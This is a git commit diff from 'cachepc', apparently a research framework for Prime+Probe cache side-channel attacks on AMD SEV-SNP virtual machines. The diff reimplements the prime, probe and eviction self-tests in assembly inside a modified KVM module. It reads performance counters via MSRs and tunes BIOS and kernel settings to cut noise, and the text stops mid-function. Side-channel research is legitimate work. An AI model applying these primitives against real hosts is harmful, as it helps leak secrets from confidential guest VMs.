cachepc

Prime+Probe cache-based side-channel attack on AMD SEV-SNP protected virtual machines
git clone https://git.sinitax.com/sinitax/cachepc

commit 769e05dd63ed0379e7325da6e82c0c46c151ef4e
parent 0257ca8ac931775fffd74150b439eb9ddcc025aa
Author: Louis Burda <quent.burda@gmail.com>
Date:   Sat, 21 Jan 2023 02:23:52 +0100

Reimplement tests and prime+probe in asm, make self-tests harder and reduce noise

Diffstat:
M Makefile | 8 +++++---
M README | 6 +++++-
M cachepc/asm.S | 152 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++-------------------------
D cachepc/asm.h | 66 ------------------------------------------------------------------
M cachepc/cachepc.c | 109 +++++++++++++++++++++++++++++++++++++++++++++-----------------------------------------------------------------
M cachepc/cachepc.h | 161 ++++-------------------------------------------------------------------------------
M cachepc/const.h | 5 ++++-
M cachepc/kvm.c | 157 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++-----------------------------------------------
A cachepc/macro.S | 66 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
M test/eviction.c | 14 ++++----------
M test/kvm-eviction.c | 11 +++++++++--
M test/kvm-eviction_guest.S | 2 +-
M test/kvm.c | 221 ++++++++++++++++++++-----------------------------------------------------------
M test/kvm.h | 2 +-
14 files changed, 369 insertions(+), 611 deletions(-)

diff --git a/Makefile b/Makefile
@@ -49,12 +49,14 @@ load:
 	sudo insmod $(LINUX)/arch/x86/kvm/kvm.ko
 	sudo insmod $(LINUX)/arch/x86/kvm/kvm-amd.ko
 
-freq:
+prep:
+	sudo sh -c "echo 0 > /proc/sys/kernel/watchdog"
 	sudo cpupower frequency-set -f 3.7GHz
 
 util/%: util/%.c $(CACHEPC_UAPI)
 
-test/%: test/%.c $(CACHEPC_UAPI)
+test/eviction: test/eviction.c test/util.c $(CACHEPC_UAPI)
+	$(CC) -o $@ $(filter %.c,$^) $(filter %.S,$^) $(CFLAGS)
 
 test/kvm-eviction: test/kvm-eviction.c test/kvm-eviction_guest.S test/util.c \
 		test/util.h test/kvm.c test/kvm.h test/kvm-eviction.h $(CACHEPC_UAPI)
@@ -64,4 +66,4 @@ test/kvm-step: test/kvm-step.c test/kvm-step_guest.S \
 		test/util.c test/util.h test/kvm.c test/kvm.h $(CACHEPC_UAPI)
 	$(CC) -o $@ $(filter %.c,$^) $(filter %.S,$^) $(CFLAGS)
 
-.PHONY: all clean host build load freq
+.PHONY: all clean host build load prep
diff --git a/README b/README
@@ -54,9 +54,12 @@ setup
 Testing was done on a Supermicro H12SSL-i V1.01 motherboard
 and AMD EPYC 72F3 (Family 0x19, Model 0x01) cpu.
 
-The following BIOS settings differ from the defaults:
+The following non-default BIOS settings were used:
 Advanced > CPU Configuration > Local APIC Mode = xAPIC
+Advanced > CPU Configuration > Core Performance Boost = Disabled
+Advanced > CPU Configuration > SMT Control = Disabled
+Advanced > CPU Configuration > Global C-state Control = Disabled
 Advanced > CPU Configuration > L1 Stream HW Prefetcher = Disabled
 Advanced > CPU Configuration > L2 Stream HW Prefetcher = Disabled
 Advanced > CPU Configuration > SMEE = Enabled
@@ -76,6 +79,7 @@ kvm_amd.sev=1 kvm_amd.sev_es=1 nokaslr debug systemd.log_level=info
 
 To successfully build and load the kvm.ko and kvm-amd.ko modules, ensure
 that a host kernel debian package was built using `make host`.
+
 Because of bad decisions made in regards to version control, the checked
 out commit of the modified kernel (previously the kernel patch file)
 might be incorrect for older revisions.
diff --git a/cachepc/asm.S b/cachepc/asm.S
@@ -1,65 +1,121 @@
-.global stream_hwpf_test
+#include "macro.S"
 
-stream_hwpf_test:
+.global cachepc_read_pmc
+.global cachepc_prime_probe_test_asm
+.global cachepc_stream_hwpf_test_asm
+.global cachepc_single_eviction_test_asm
+
+cachepc_read_pmc:
+	push %rbx
+	push %rcx
+	push %rdx
+	push %r8
+
+	readpmc %rdi %r8
+	mov %r8, %rax
+
+	pop %r8
+	pop %rdx
+	pop %rcx
+	pop %rbx
+
+	ret
+
+cachepc_prime_probe_test_asm:
+	push %rbx
+	push %rcx
+	push %rdx
+	push %r8
+	push %r9
+	push %r10
+	push %r11
+	push %r12
+
+	wbinvd
+
+	mov cachepc_ds, %r9
+	prime prime_probe_test %r9 %r10 %r8
+	mov cachepc_ds, %r9
+	prime prime_probe_test1 %r9 %r10 %r8
+	mov cachepc_ds, %r9
+	prime prime_probe_test2 %r9 %r10 %r8
+	probe prime_probe_test %r8 %r9 %r10 %r11 %r12
+
+	pop %r12
+	pop %r11
+	pop %r10
+	pop %r9
+	pop %r8
+	pop %rdx
+	pop %rcx
+	pop %rbx
+
+	ret
+
+cachepc_stream_hwpf_test_asm:
 	push %rbx
 	push %rcx
 	push %rdx
+	push %r8
+	push %r9
+
+	wbinvd
+
+	readpmc $CPC_L1MISS_PMC %r8
+
+	mov 0x000(%rdi), %rax
+	mov 0x040(%rdi), %rax
+	mov 0x080(%rdi), %rax
+	mov 0x0c0(%rdi), %rax
+	mov 0x100(%rdi), %rax
+	mov 0x140(%rdi), %rax
+	mov 0x180(%rdi), %rax
+	mov 0x1c0(%rdi), %rax
+	mov 0x200(%rdi), %rax
+	mov 0x240(%rdi), %rax
+
+	readpmc $CPC_L1MISS_PMC %r9
+
+	mov %r9, %rax
+	sub %r8, %rax
+
+	pop %r9
+	pop %r8
+	pop %rdx
+	pop %rcx
+	pop %rbx
+
+	ret
+
+cachepc_single_eviction_test_asm:
+	push %rbx
+	push %rcx
+	push %rdx
+	push %r8
+	push %r9
 	push %r10
 	push %r11
+	push %r12
 
 	wbinvd
-	mfence
 
-	mov $0x80000005,%eax
-	cpuid
-
-	mov $0, %rax
-	mov $0, %rdx
-	mov $0xc0010201,%rcx
-	rdmsr
-	shl $32, %rdx
-	or %rax, %rdx
-
-	mov %rdx, %r10
-
-	mfence
-	mov $0x80000005,%eax
-	cpuid
-
-	# mov 0x00(%rdi), %rax
-	# mov 0x48(%rdi), %rax
-	# mov 0x20(%rdi), %rax
-	# mov 0x38(%rdi), %rax
-	# mov 0x18(%rdi), %rax
-	# mov 0x48(%rdi), %rax
-	# mov 0x50(%rdi), %rax
-	# mov 0x58(%rdi), %rax
-	# mov 0x60(%rdi), %rax
-
-	mfence
-	mov $0x80000005,%eax
-	cpuid
-
-	mov $0, %rax
-	mov $0, %rdx
-	mov $0xc0010201,%rcx
-	rdmsr
-	shl $32, %rdx
-	or %rax, %rdx
-
-	mov %rdx, %r11
-
-	mfence
-	mov $0x80000005,%eax
-	cpuid
-
-	mov %r11, %rax
-	sub %r10, %rax
+	mov cachepc_ds, %r9
+	prime single_eviction_test %r9 %r10 %r8
+	mov cachepc_ds, %r9
+	prime single_eviction_test2 %r9 %r10 %r8
+	mov cachepc_ds, %r9
+	prime single_eviction_test3 %r9 %r10 %r8
+	mov (%rdi), %rax
+	probe single_eviction_test %r8 %r9 %r10 %r11 %r12
 
+	pop %r12
 	pop %r11
 	pop %r10
+	pop %r9
+	pop %r8
 	pop %rdx
 	pop %rcx
 	pop %rbx
 
 	ret
+
diff --git a/cachepc/asm.h b/cachepc/asm.h
@@ -1,66 +0,0 @@
-#pragma once
-
-#include <linux/kernel.h>
-
-#define CPUID_AFFECTED_REGS "rax", "rbx", "rcx", "rdx"
-
-__attribute__((always_inline))
-static inline void cachepc_cpuid(void);
-
-__attribute__((always_inline))
-static inline void cachepc_lfence(void);
-
-__attribute__((always_inline))
-static inline void cachepc_sfence(void);
-
-__attribute__((always_inline))
-static inline void cachepc_mfence(void);
-
-__attribute__((always_inline))
-static inline void cachepc_readq(void *p);
-
-void
-cachepc_cpuid(void)
-{
-	asm volatile(
-		"mov $0x80000005, %%eax\n\t"
-		"cpuid\n\t"
-		::: CPUID_AFFECTED_REGS
-	);
-}
-
-void
-cachepc_lfence(void)
-{
-	asm volatile(
-		"lfence\n\t"
-		::: "memory"
-	);
-}
-
-void
-cachepc_sfence(void)
-{
-	asm volatile(
-		"sfence\n\t"
-		::: "memory"
-	);
-}
-
-void
-cachepc_mfence(void)
-{
-	asm volatile(
-		"mfence\n\t"
-		::: "memory"
-	);
-}
-
-void
-cachepc_readq(void *p)
-{
-	asm volatile (
-		"movq (%0), %%r10\n\t"
-		: : "r" (p) : "r10"
-	);
-}
diff --git a/cachepc/cachepc.c b/cachepc/cachepc.c
@@ -4,7 +4,7 @@
 #include "../../include/asm/processor.h"
 
 #include <linux/kernel.h>
-#include <linux/types.h>
+#include <linux/types.h>
 #include <linux/slab.h>
 #include <linux/delay.h>
 #include <linux/ioctl.h>
@@ -39,10 +39,7 @@ cachepc_verify_topology(void)
 		"virtual memory access will hit corresponding "
 		"physical cacheline, PAGE_SIZE != L1_SETS * L1_LINESIZE");
 
-
-	/* REF: https://developer.amd.com/resources/developer-guides-manuals
-	 * (PPR 17H 31H, P.81) */
-
+	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.94 */
 	val = native_cpuid_ecx(0x80000005);
 	size = ((val >> 24) & 0xFF) * 1024;
 	assoc = (val >> 16) & 0xFF;
@@ -50,8 +47,8 @@ cachepc_verify_topology(void)
 	sets = size / (linesize * assoc);
 	if (size != L1_SIZE || assoc != L1_ASSOC
 			|| linesize != L1_LINESIZE || sets != L1_SETS) {
-		CPC_ERR("L1 topology is invalid!\n");
-		CPC_ERR("L1_SIZE (expected) %u vs. (real) %u\n",
+		CPC_ERR("L1 topology is invalid!\n");
+		CPC_ERR("L1_SIZE (expected) %u vs. (real) %u\n",
 			L1_SIZE, size);
 		CPC_ERR("L1_ASSOC (expected) %u vs. (real) %u\n",
 			L1_ASSOC, assoc);
@@ -62,6 +59,7 @@ cachepc_verify_topology(void)
 		return true;
 	}
 
+	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.94 */
 	val = native_cpuid_ecx(0x80000006);
 	size = ((val >> 16) & 0xFFFF) * 1024;
 	assoc = (val >> 12) & 0xF;
@@ -121,25 +119,23 @@ void
 cachepc_write_msr(uint64_t addr, uint64_t clear_bits, uint64_t set_bits)
 {
 	uint64_t val, newval;
-	uint32_t lo, hi;
 
-	asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(addr));
-	val = (uint64_t) lo | ((uint64_t) hi << 32);
+	val = __rdmsr(addr);
 	val &= ~clear_bits;
 	val |= set_bits;
-	asm volatile ("wrmsr" : : "c"(addr), "a"(val), "d"(0x00));
+	native_wrmsrl(addr, val);
 
-	asm volatile ("rdmsr" : "=a"(lo), "=d"(hi) : "c"(addr));
-	newval = (uint64_t) lo | ((uint64_t) hi << 32);
-	if (val != newval)
-		CPC_ERR("Write MSR failed at addr %08llX\n", addr);
+	newval = __rdmsr(addr);
+	if (val != newval) {
+		CPC_ERR("Write MSR at %08llX failed (%08llx vs %08llx)\n",
+			addr, val, newval);
+	}
 }
 
 void
 cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask,
 	uint8_t host_guest, uint8_t kernel_user)
 {
-	uint64_t reg_addr;
 	uint64_t event;
 
 	/* REF: PPR Family 19h Model 01h Vol 1/2 Rev 0.50 May 27.2021 P.166 */
@@ -147,34 +143,27 @@ cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask,
 	WARN_ON(index >= 6);
 	if (index >= 6) return;
 
-	reg_addr = 0xc0010200 + index * 2;
 	event = event_no | (event_mask << 8);
 	event |= (1ULL << 22); /* enable performance counter */
 	event |= ((kernel_user & 0b11) * 1ULL) << 16;
 	event |= ((host_guest & 0b11) * 1ULL) << 40;
 
-	printk(KERN_WARNING "CachePC: Initializing %i. PMC %02X:%02X (%016llx)\n",
-		index, event_no, event_mask, event);
-	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(event), "d"(0x00));
+	// CPC_INFO("Initializing %i. PMC %02X:%02X (%016llx)\n",
+	// 	index, event_no, event_mask, event);
+	cachepc_write_msr(0xc0010200 + index * 2, ~0ULL, event);
 }
 
 void
 cachepc_reset_pmc(uint8_t index)
 {
-	uint64_t reg_addr;
-	uint64_t value;
-
 	WARN_ON(index >= 6);
 	if (index >= 6) return;
 
-	reg_addr = 0xc0010201 + index * 2;
-	value = 0;
-
-	asm volatile ("wrmsr" : : "c"(reg_addr), "a"(value), "d"(0x00));
+	cachepc_write_msr(0xc0010201 + index * 2, ~0ULL, 0);
 }
 
 cache_ctx *
-cachepc_get_ctx(int cache_level)
+cachepc_get_ctx(void)
 {
 	cache_ctx *ctx;
 
@@ -183,7 +172,6 @@ cachepc_get_ctx(void)
 
 	ctx->sets = L1_SETS;
 	ctx->associativity = L1_ASSOC;
-	ctx->cache_level = cache_level;
 	ctx->nr_of_cachelines = ctx->sets * ctx->associativity;
 	ctx->set_size = L1_LINESIZE * ctx->associativity;
 	ctx->cache_size = ctx->sets * ctx->set_size;
@@ -197,9 +185,7 @@ cachepc_release_ctx(cache_ctx *ctx)
 	kfree(ctx);
 }
 
-/*
- * Initialises the complete cache data structure for the given context
- */
+/* initialises the complete cache data structure for the given context */
 cacheline *
 cachepc_prepare_ds(cache_ctx *ctx)
 {
@@ -261,12 +247,20 @@ cachepc_save_msrmts(cacheline *head)
 			BUG_ON(curr_cl->cache_set >= L1_SETS);
 			WARN_ON(curr_cl->count > L1_ASSOC);
 			cachepc_msrmts[curr_cl->cache_set] = curr_cl->count;
+		} else {
+			BUG_ON(curr_cl->count != 0);
 		}
 
-		curr_cl->count = 0;
 		curr_cl = curr_cl->prev;
 	} while (curr_cl != head);
 
+	if (cachepc_baseline_measure) {
+		for (i = 0; i < L1_SETS; i++) {
+			cachepc_baseline[i] = MIN(cachepc_baseline[i],
+				cachepc_msrmts[i]);
+		}
+	}
+
 	if (cachepc_baseline_active) {
 		for (i = 0; i < L1_SETS; i++) {
 			if (!cachepc_baseline_active)
@@ -292,33 +286,6 @@ cachepc_print_msrmts(cacheline *head)
 	} while (curr_cl != head);
 }
 
-void
-cachepc_update_baseline(void)
-{
-	size_t i;
-
-	for (i = 0; i < L1_SETS; i++) {
-		cachepc_baseline[i] = MIN(cachepc_baseline[i],
-			cachepc_msrmts[i]);
-	}
-}
-
-void __attribute__((optimize(1))) // prevent instruction reordering
-cachepc_prime_vcall(uintptr_t ret, cacheline *cl)
-{
-	if (cachepc_singlestep)
-		cachepc_apic_oneshot(cachepc_apic_timer / CPC_APIC_TIMER_SOFTDIV);
-	cachepc_prime(cl);
-	asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax");
-}
-
-void __attribute__((optimize(1))) // prevent instruction reordering
-cachepc_probe_vcall(uintptr_t ret, cacheline *cl)
-{
-	cachepc_probe(cl);
-	asm volatile ("mov %0, %%rax; jmp *%%rax" : : "r"(ret) : "rax");
-}
-
 cacheline *
 prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len)
 {
@@ -335,8 +302,8 @@ prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len)
 	last_cl_in_sets = kzalloc(ctx->sets * sizeof(cacheline *), GFP_KERNEL);
 	BUG_ON(last_cl_in_sets == NULL);
 
-	// Find the cache groups that are used, so that we can delete the other ones
-	// later (to avoid memory leaks)
+	/* find the cache groups that are used, so that we can delete the
+	 * other ones later (to avoid memory leaks) */
 	cache_groups_max_len = ctx->sets / CACHE_GROUP_SIZE;
 	cache_groups = kmalloc(cache_groups_max_len * sizeof(uint32_t), GFP_KERNEL);
 	BUG_ON(cache_groups == NULL);
@@ -352,7 +319,8 @@ prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len)
 	to_del_cls = NULL;
 	curr_cl = cache_ds;
 
-	// Extract the partial data structure for the cache sets and ensure correct freeing
+	/* extract the partial data structure for the cache sets and
+	 * ensure correct freeing */
 	do {
 		next_cl = curr_cl->next;
 
@@ -367,7 +335,7 @@ prepare_cache_set_ds(cache_ctx *ctx, uint32_t *sets, uint32_t sets_len)
 	} while (curr_cl != cache_ds);
 
-	// Fix partial cache set ds
+	/* fix partial cache set ds */
 	for (i = 0; i < sets_len; ++i) {
 		last_cl_in_sets[sets[i]]->next = first_cl_in_sets[sets[(i + 1) % sets_len]];
 		first_cl_in_sets[sets[(i + 1) % sets_len]]->prev = last_cl_in_sets[sets[i]];
@@ -423,13 +391,13 @@ build_cache_ds(cache_ctx *ctx, cacheline **cl_ptr_arr) {
 		idx_per_set[cl_ptr_arr[i]->cache_set] += 1;
 	}
 
-	// Build doubly linked list for every set
+	/* build doubly linked list for every set */
 	for (set = 0; set < ctx->sets; ++set) {
 		set_offset = set * set_len;
 		build_randomized_list_for_cache_set(ctx, cl_ptr_arr_sorted + set_offset);
 	}
 
-	// Relink the sets among each other
+	/* relink the sets among each other */
 	idx_map = kzalloc(ctx->sets * sizeof(uint32_t), GFP_KERNEL);
 	BUG_ON(idx_map == NULL);
 
@@ -552,7 +520,6 @@ gen_random_indices(uint32_t *arr, uint32_t arr_len)
 	random_perm(arr, arr_len);
 }
 
-
 bool
 is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len)
 {
@@ -565,3 +532,11 @@ is_in_arr(uint32_t elem, uint32_t *arr, uint32_t arr_len)
 
 	return false;
 }
+
+void
+cachepc_apic_oneshot(uint32_t interval)
+{
+	native_apic_mem_write(APIC_LVTT, LOCAL_TIMER_VECTOR | APIC_LVT_TIMER_ONESHOT);
+	native_apic_mem_write(APIC_TDCR, APIC_TDR_DIV_1);
+	native_apic_mem_write(APIC_TMICT, interval);
+}
diff --git a/cachepc/cachepc.h b/cachepc/cachepc.h
@@ -1,14 +1,10 @@
 #pragma once
 
-#include "asm.h"
 #include "uapi.h"
 
 #include "../../include/asm/apic.h"
 #include "../../include/asm/irq_vectors.h"
 
-#define L1_CACHE 0
-#define L2_CACHE 1
-
 #define CACHE_GROUP_SIZE (PAGE_SIZE / L1_LINESIZE)
 
 #define CACHEPC_GET_BIT(b, i) (((b) >> (i)) & 1)
@@ -27,9 +23,6 @@
 #define CL_IS_LAST(flags) CACHEPC_GET_BIT(flags, 1)
 #define CL_IS_GROUP_INIT(flags) CACHEPC_GET_BIT(flags, 2)
 
-#define CL_NEXT_OFFSET offsetof(struct cacheline, next)
-#define CL_PREV_OFFSET offsetof(struct cacheline, prev)
-
 #define PMC_KERNEL (1 << 1)
 #define PMC_USER (1 << 0)
 
@@ -42,14 +35,10 @@
 #define CPC_WARN(...) do { pr_warn("CachePC: " __VA_ARGS__); } while (0)
 #define CPC_ERR(...) do { pr_err("CachePC: " __VA_ARGS__); } while (0)
 
-#define CPC_APIC_TIMER_SOFTDIV 3
-
 typedef struct cacheline cacheline;
 typedef struct cache_ctx cache_ctx;
 
 struct cache_ctx {
-	int cache_level;
-
 	uint32_t sets;
 	uint32_t associativity;
 	uint32_t nr_of_cachelines;
@@ -58,18 +47,15 @@ struct cache_ctx {
 };
 
 struct cacheline {
-	/* Doubly linked cache lines inside same cache set */
 	cacheline *next;
 	cacheline *prev;
+	uint64_t count;
 
 	uint32_t cache_set;
 	uint32_t cache_line;
 	uint32_t flags;
 
-	uint64_t count;
-
-	/* padding to fill cache line */
-	char padding[24];
+	char padding[28];
 };
 
 struct cpc_fault {
@@ -79,19 +65,20 @@ struct cpc_fault {
 	struct list_head list;
 };
 
-static_assert(sizeof(struct cacheline) == L1_LINESIZE,
-	"Bad cache line struct size");
+static_assert(sizeof(struct cacheline) == L1_LINESIZE, "Bad cacheline struct");
 static_assert(CPC_CL_NEXT_OFFSET == offsetof(struct cacheline, next));
 static_assert(CPC_CL_PREV_OFFSET == offsetof(struct cacheline, prev));
+static_assert(CPC_CL_COUNT_OFFSET == offsetof(struct cacheline, count));
 
 bool cachepc_verify_topology(void);
 
 void cachepc_write_msr(uint64_t addr, uint64_t clear_bits, uint64_t set_bits);
+
 void cachepc_init_pmc(uint8_t index, uint8_t event_no, uint8_t event_mask,
 	uint8_t host_guest, uint8_t kernel_user);
 void cachepc_reset_pmc(uint8_t index);
 
-cache_ctx *cachepc_get_ctx(int cache_level);
+cache_ctx *cachepc_get_ctx(void);
 void cachepc_release_ctx(cache_ctx *ctx);
 
 cacheline *cachepc_prepare_ds(cache_ctx *ctx);
@@ -104,28 +91,18 @@ void *cachepc_aligned_alloc(size_t alignment, size_t size);
 
 void cachepc_save_msrmts(cacheline *head);
 void cachepc_print_msrmts(cacheline *head);
 
-void cachepc_update_baseline(void);
-
-void cachepc_prime_vcall(uintptr_t ret, cacheline *cl);
-void cachepc_probe_vcall(uintptr_t ret, cacheline *cl);
-
-__attribute__((always_inline))
-static inline cacheline *cachepc_prime(cacheline *head);
-
-__attribute__((always_inline))
-static inline cacheline *cachepc_probe(cacheline *head);
-
-__attribute__((always_inline))
-static inline void cachepc_victim(void *p);
+cacheline *cachepc_prime(cacheline *head);
+void cachepc_probe(cacheline *head);
 
-__attribute__((always_inline))
-static inline uint64_t cachepc_read_pmc(uint64_t event);
+uint64_t cachepc_read_pmc(uint64_t event);
 
-__attribute__((always_inline))
-static inline void cachepc_apic_oneshot(uint32_t interval);
+void cachepc_apic_oneshot(uint32_t interval);
 
 extern bool cachepc_debug;
 
+extern struct cacheline *cachepc_victim;
+
 extern uint8_t *cachepc_msrmts;
 extern uint8_t *cachepc_baseline;
 extern bool cachepc_baseline_measure;
@@ -159,117 +136,3 @@ extern cacheline *cachepc_ds;
 
 extern uint64_t cachepc_regs_tmp[16];
 extern uint64_t cachepc_regs_vm[16];
-
-/*
- * Prime phase: fill the target cache (encoded in the size of the data structure)
- * with the prepared data structure, i.e. with attacker data.
- */
-cacheline *
-cachepc_prime(cacheline *head)
-{
-	cacheline *curr_cl, *prev_cl;
-
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	curr_cl = head;
-	do {
-		prev_cl = curr_cl;
-		curr_cl = curr_cl->next;
-	} while (curr_cl != head);
-
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	return prev_cl;
-}
-
-cacheline *
-cachepc_probe(cacheline *start_cl)
-{
-	uint64_t pre, post;
-	cacheline *next_cl;
-	cacheline *curr_cl;
-
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	curr_cl = start_cl;
-
-	do {
-		pre = cachepc_read_pmc(0);
-
-		asm volatile(
-			"mov 8(%[curr_cl]), %%rax \n\t"              // +8
-			"mov 8(%%rax), %%rcx \n\t"                   // +16
-			"mov 8(%%rcx), %%rax \n\t"                   // +24
-			"mov 8(%%rax), %%rcx \n\t"                   // +32
-			"mov 8(%%rcx), %%rax \n\t"                   // +40
-			"mov 8(%%rax), %%rcx \n\t"                   // +48
-			"mov 8(%%rcx), %[curr_cl_out] \n\t"          // +56
-			"mov 8(%[curr_cl_out]), %[next_cl_out] \n\t" // +64
-			: [next_cl_out] "=r" (next_cl),
-			  [curr_cl_out] "=r" (curr_cl)
-			: [curr_cl] "r" (curr_cl)
-			: "rax", "rcx"
-		);
-
-		post = cachepc_read_pmc(0);
-
-		/* works across size boundary */
-		curr_cl->count = post - pre;
-
-		curr_cl = next_cl;
-	} while (__builtin_expect(curr_cl != start_cl, 1));
-
-	next_cl = curr_cl->next;
-
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	return next_cl;
-}
-
-void
-cachepc_victim(void *p)
-{
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	cachepc_readq(p);
-
-	cachepc_mfence();
-	cachepc_cpuid();
-}
-
-uint64_t
-cachepc_read_pmc(uint64_t event)
-{
-	uint32_t lo, hi;
-	uint64_t res;
-
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	event = 0xC0010201 + 2 * event;
-
-	asm volatile (
-		"rdmsr"
-		: "=a" (lo), "=d" (hi)
-		: "c"(event)
-	);
-	res = (((uint64_t) hi) << 32) | (uint64_t) lo;
-
-	cachepc_mfence();
-	cachepc_cpuid();
-
-	return res;
-}
-
-void
-cachepc_apic_oneshot(uint32_t interval)
-{
-	native_apic_mem_write(APIC_LVTT, LOCAL_TIMER_VECTOR | APIC_LVT_TIMER_ONESHOT);
-	native_apic_mem_write(APIC_TDCR, APIC_TDR_DIV_1);
-	native_apic_mem_write(APIC_TMICT, interval);
-}
diff --git a/cachepc/const.h b/cachepc/const.h
@@ -21,4 +21,7 @@
 #define KVM_HC_CPC_VMMCALL_EXIT 0xEE02
 
 #define CPC_CL_NEXT_OFFSET 0
-#define CPC_CL_PREV_OFFSET 0
+#define CPC_CL_PREV_OFFSET 8
+#define CPC_CL_COUNT_OFFSET 16
+
+#define CPC_APIC_TIMER_SOFTDIV 3
diff --git a/cachepc/kvm.c b/cachepc/kvm.c
@@ -16,11 +16,14 @@
 #include <linux/types.h>
 #include <asm/uaccess.h>
 
-#define TEST_REPEAT_MAX 200
+#define TEST_REPEAT_MAX 1000
 
 bool cachepc_debug = false;
 EXPORT_SYMBOL(cachepc_debug);
 
+struct cacheline *cachepc_victim;
+EXPORT_SYMBOL(cachepc_victim);
+
 uint8_t *cachepc_msrmts = NULL;
 EXPORT_SYMBOL(cachepc_msrmts);
 
@@ -95,9 +98,14 @@ EXPORT_SYMBOL(cachepc_event_avail);
 bool cachepc_events_init;
 EXPORT_SYMBOL(cachepc_events_init);
 
-static noinline void cachepc_kvm_prime_probe_test(void);
-static noinline void cachepc_kvm_stream_hwpf_test(void);
-static noinline void cachepc_kvm_single_eviction_test(void *p);
+void cachepc_prime_probe_test_asm(void);
+static noinline void cachepc_prime_probe_test(void);
+
+uint64_t cachepc_stream_hwpf_test_asm(void *lines);
+static noinline void cachepc_stream_hwpf_test(void);
+
+void cachepc_single_eviction_test_asm(void *ptr);
+static noinline void cachepc_single_eviction_test(void *p);
 
 static void cachepc_kvm_system_setup(void);
 
@@ -129,31 +137,21 @@ static int cachepc_kvm_ack_event_ioctl(void __user *arg_user);
 static int cachepc_kvm_req_pause_ioctl(void __user *arg_user);
 
 void
-cachepc_kvm_prime_probe_test(void)
+cachepc_prime_probe_test(void)
 {
-	cacheline *lines;
-	cacheline *cl, *head;
-	uint32_t count;
-	int n;
+	int i, n, count;
 
 	/* l2 data cache hit & miss */
-	cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, PMC_HOST, PMC_KERNEL);
-
-	lines = cachepc_aligned_alloc(PAGE_SIZE, cachepc_ctx->cache_size);
-
-	wbinvd();
+	cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, 0, PMC_KERNEL);
 
 	for (n = 0; n < TEST_REPEAT_MAX; n++) {
-		head = cachepc_prime(cachepc_ds);
-		cachepc_probe(head);
+		memset(cachepc_msrmts, 0, L1_SETS);
+		cachepc_prime_probe_test_asm();
+		cachepc_save_msrmts(cachepc_ds);
 
 		count = 0;
-		cl = head = cachepc_ds;
-		do {
-			if (CL_IS_FIRST(cl->flags))
-				count += cl->count;
-			cl = cl->next;
-		} while (cl != head);
+		for (i = 0; i < L1_SETS; i++)
+			count += cachepc_msrmts[i];
 
 		if (count != 0) {
 			CPC_ERR("Prime-probe %i. test failed (%u vs. %u)\n",
@@ -163,30 +161,25 @@ cachepc_prime_probe_test(void)
 	}
 
 	if (n == TEST_REPEAT_MAX)
-		CPC_WARN("Prime-probe test ok (%u vs. %u)\n", count, 0);
-
-	kfree(lines);
+		CPC_INFO("Prime-probe test ok (%u vs. %u)\n", count, 0);
 }
 
-uint64_t stream_hwpf_test(void *lines);
-
 void
-cachepc_kvm_stream_hwpf_test(void)
+cachepc_stream_hwpf_test(void)
 {
-	cacheline *lines;
 	const uint32_t max = 10;
+	cacheline *lines;
 	uint32_t count;
 	int n;
 
 	/* l2 data cache hit & miss */
-	cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, PMC_HOST, PMC_KERNEL);
+	cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, 0, PMC_KERNEL);
 
 	lines = cachepc_aligned_alloc(L1_SIZE, L1_SIZE);
 
 	count = 0;
 	for (n = 0; n < TEST_REPEAT_MAX; n++) {
-		count = stream_hwpf_test(lines);
-		//count = cachepc_read_pmc(CPC_L1MISS_PMC);
+		count = cachepc_stream_hwpf_test_asm(lines);
 		if (count != max) {
 			CPC_ERR("HWPF %i. test failed (%u vs. %u)\n",
 				n, count, max);
@@ -201,51 +194,39 @@ cachepc_stream_hwpf_test(void)
 }
 
 void
-cachepc_kvm_single_eviction_test(void *p)
+cachepc_single_eviction_test(void *p)
 {
-	cacheline *head, *cl, *evicted;
-	cacheline *ptr;
+	cacheline *victim;
 	uint32_t target;
 	uint32_t *arg;
-	int n, count;
+	int n, i, count;
 
 	arg = p;
 
 	/* l2 data cache hit & miss */
-	cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, PMC_HOST, PMC_KERNEL);
+	cachepc_init_pmc(CPC_L1MISS_PMC, 0x64, 0xD8, 0, PMC_KERNEL);
 
 	WARN_ON(arg && *arg >= L1_SETS);
 	if (arg && *arg >= L1_SETS) return;
 	target = arg ? *arg : 48;
 
-	ptr = cachepc_prepare_victim(cachepc_ctx, target);
-
-	wbinvd();
+	victim = cachepc_prepare_victim(cachepc_ctx, target);
 
 	for (n = 0; n < TEST_REPEAT_MAX; n++) {
-		head = cachepc_prime(cachepc_ds);
-		cachepc_victim(ptr);
-		cachepc_probe(head);
+		memset(cachepc_msrmts, 0, L1_SETS);
+		cachepc_single_eviction_test_asm(victim);
+		cachepc_save_msrmts(cachepc_ds);
 
 		count = 0;
-		evicted = NULL;
-		cl = head = cachepc_ds;
-		do {
-			if (CL_IS_FIRST(cl->flags) && cl->count > 0) {
-				evicted = cl;
-				count += cl->count;
-			}
-			cl = cl->next;
-		} while (cl != head);
-
-		if (count != 1 || evicted->cache_set != target) {
+		for (i = 0; i < L1_SETS; i++)
+			count += cachepc_msrmts[i];
+
